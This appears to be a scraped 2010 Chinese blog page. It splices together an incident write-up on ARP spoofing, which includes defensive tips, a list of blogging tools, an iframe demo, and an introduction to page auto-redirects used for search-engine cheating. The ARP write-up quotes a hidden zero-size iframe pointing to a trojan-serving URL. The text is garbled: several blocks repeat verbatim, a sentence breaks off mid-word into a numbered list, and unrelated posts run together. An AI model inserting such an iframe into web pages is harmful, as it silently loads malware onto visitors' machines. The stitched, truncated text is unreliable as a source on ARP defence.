1
2010/04/11 
22:47 
422
---------------权威资料看这里---------------
清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf
---------------民间资料看这里---------------
网站突然出现访问迟钝,并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码,在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
height=0></iframe> 嵌套框架网页,该网页执行木马程序......
所以估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,但下载文件下来查看却没有该代码。怎么回事呢?原来是机房局域网中有服务器中ARP病毒了,模拟网关进行欺骗,拦截Http数据包自动加入iframe代码。
那么什么是"ARP欺骗"呢?
首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC
无法收到信息。
第二种ARP欺骗的原理是----伪造网关,ARP网关欺骗。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,"网络掉线了"。
ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
而本次我的网站服务器所在的托管机房同一局域网中的某台服��设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
8、管理员定期轮询,检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。
清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf
---------------民间资料看这里---------------
网站突然出现访问迟钝,并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码,在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
height=0></iframe> 嵌套框架网页,该网页执行木马程序......
所以估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,但下载文件下来查看却没有该代码。怎么回事呢?原来是机房局域网中有服务器中ARP病毒了,模拟网关进行欺骗,拦截Http数据包自动加入iframe代码。
那么什么是"ARP欺骗"呢?
首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC
无法收到信息。
第二种ARP欺骗的原理是----伪造网关,ARP网关欺骗。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,"网络掉线了"。
ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
而本次我的网站服务器所在的托管机房同一局域网中的某台服��设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
8、管理员定期轮询,检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。
互联网上有很多专门的工具可以提高您的Blog质量,下面就是50个有助于Blogging的在线工具列表,它们将帮助你更有效的进行创建和发布Blog。
主机, DNS 和域名
1. Domainscour: 这是一个用来查找域名是否有效的网站,非常的Web2.0化,支持.com .net .org .biz 及 .info域名。
#注:关于域名的寻找,你还可以参看此文:如何寻找有价值的域名。
2. MyIPneighbours: 根据IP或域名查找同一虚拟主机上的其他站点。
3. WhoIshostingthis: 是一个挺有意思服务,通过输入域名,就可查询出当前站点位于哪个主机空间商或托管商。这个功能对于那些想寻找一款好主机的朋友来说应该是相当实用的,当你看到人家的Blog运行如飞的时候,你就可以利用此工具来看看他用的是什么主机了,也不必麻烦到别人。
4. You Get Signal: 一个网络工具集合服务,它提供了一系列的网络、主机及IP信息查询工具。
设计和色彩.
5. GenFavIcon: 在线Favicons图标创建工具。
6. Color Palette generator: 这个工具适合被利用在以一张图片作为网站主题的时候,选择与这张图片搭配的网页用色。
7. Color Scheme Generator 2: 在线多功能调色盘. 当你在设计网页、电脑应用程式或室内设计时,往往需要寻找适合的颜色配置,这个工个就可帮助你。
8. Font Tester: 字体在线测试,免费在线排版工具,都是网络安全字体。.
9. Screen Size Tester: 屏幕尺寸测试。检查您的网站在不同屏幕尺寸先的显示效果。
程序和代码
10. Grid: 网格工具。
主机, DNS 和域名
1. Domainscour: 这是一个用来查找域名是否有效的网站,非常的Web2.0化,支持.com .net .org .biz 及 .info域名。
#注:关于域名的寻找,你还可以参看此文:如何寻找有价值的域名。
2. MyIPneighbours: 根据IP或域名查找同一虚拟主机上的其他站点。
3. WhoIshostingthis: 是一个挺有意思服务,通过输入域名,就可查询出当前站点位于哪个主机空间商或托管商。这个功能对于那些想寻找一款好主机的朋友来说应该是相当实用的,当你看到人家的Blog运行如飞的时候,你就可以利用此工具来看看他用的是什么主机了,也不必麻烦到别人。
4. You Get Signal: 一个网络工具集合服务,它提供了一系列的网络、主机及IP信息查询工具。
设计和色彩.
5. GenFavIcon: 在线Favicons图标创建工具。
6. Color Palette generator: 这个工具适合被利用在以一张图片作为网站主题的时候,选择与这张图片搭配的网页用色。
7. Color Scheme Generator 2: 在线多功能调色盘. 当你在设计网页、电脑应用程式或室内设计时,往往需要寻找适合的颜色配置,这个工个就可帮助你。
8. Font Tester: 字体在线测试,免费在线排版工具,都是网络安全字体。.
9. Screen Size Tester: 屏幕尺寸测试。检查您的网站在不同屏幕尺寸先的显示效果。
程序和代码
10. Grid: 网格工具。
点击图片可以打开一个网页链接
请看说明:
直接把代码帖到BLOG里无法显现预览,所以这里使用了IFrame标签嵌套了html
你会发现点击后打开的网页被嵌套在里面,请多按几次退格键就可以返回到初始状态
当然,你去看http://www.wormsky.com/attachment/piclinktx.html就没问题
效果预览:
源码查看地址:
http://www.wormsky.com/attachment/piclinktx.html
打开这个页面,然后鼠标右键->查看源文件,就可以看到源码了!
请看说明:
直接把代码帖到BLOG里无法显现预览,所以这里使用了IFrame标签嵌套了html
你会发现点击后打开的网页被嵌套在里面,请多按几次退格键就可以返回到初始状态
当然,你去看http://www.wormsky.com/attachment/piclinktx.html就没问题
效果预览:
源码查看地址:
http://www.wormsky.com/attachment/piclinktx.html
打开这个页面,然后鼠标右键->查看源文件,就可以看到源码了!
网页自动跳转,是指当用户访问某个网页时,被自动跳转到另一个网页中去。网页自动跳转的主要作用是,当域名变更后,或者网站里的一个或多个网页被删除后,可以使用这种方式将用户引导到其它正常的网页中去,从而留住用户。
不过,现在有许多人利用网页自动跳转来进行作弊,欺骗搜索引擎,从而实现提高网站搜索引擎排名的目的。比较典型的方式是:先做一个“桥页”,当搜索引擎收录了这个桥页,并有较高排名时,桥页中再使用网页自动跳转方式,将用户引导到用户本来无意访问的其它网页中去。
下面介绍一下五种常见的网页自动跳转方法,以及搜索引擎对这些跳转方法的辨识能力。
不过,现在有许多人利用网页自动跳转来进行作弊,欺骗搜索引擎,从而实现提高网站搜索引擎排名的目的。比较典型的方式是:先做一个“桥页”,当搜索引擎收录了这个桥页,并有较高排名时,桥页中再使用网页自动跳转方式,将用户引导到用户本来无意访问的其它网页中去。
下面介绍一下五种常见的网页自动跳转方法,以及搜索引擎对这些跳转方法的辨识能力。
